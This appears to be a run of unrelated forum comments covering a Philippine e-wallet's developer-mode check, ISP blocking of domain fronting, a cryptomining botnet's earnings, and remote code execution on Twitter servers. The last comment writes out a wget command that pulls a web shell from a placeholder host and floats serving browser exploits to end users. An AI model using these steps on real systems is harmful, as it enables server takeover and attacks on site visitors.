Philippines' most popular e-wallet app GCash outright closes when the developer mode is enabled with the popup saying that the device has "settings [enabled] that are not secure".
> Also, in this scenario what would stop users from using domain fronting or encrypted SNI to access other Facebook services?
That any day the ISP can kill those "bugs" making them useless especially for those who brought those in forms of paid VPNs, and if it doesn't, they will "block" you from the service, from not allowing to initiate LTE connection and locked to 3G, to not connect to the cell site at all.
If you go to the pool website with the address specified on the botnet you can see how much it was mined. The main article [1] linked on the news said:
> The actor has been able to mine about 630 XMR to date, which at the current USD rate is more than $172,000 for just a little more than one year of activity.
Remote code execution e.g. he can also execute 'wget http://bad.php.script/shell.php' for planting shell or 'sudo <command>' for priviledge execution (up to root). So pretty much everything you can do on their Twitter servers.
Another "fun" thing to do is if the hosted data is just sitting there, wget a browser exploit file on top of it.
This is probably not a serious concern for a place as huge as twitter because they're going to CDN static content separately from dynamic content, but would be really exciting for "I got me one server for my whole startup" types. Maybe you could bypass existing systems to serve up malicious code to end users anyway.
reply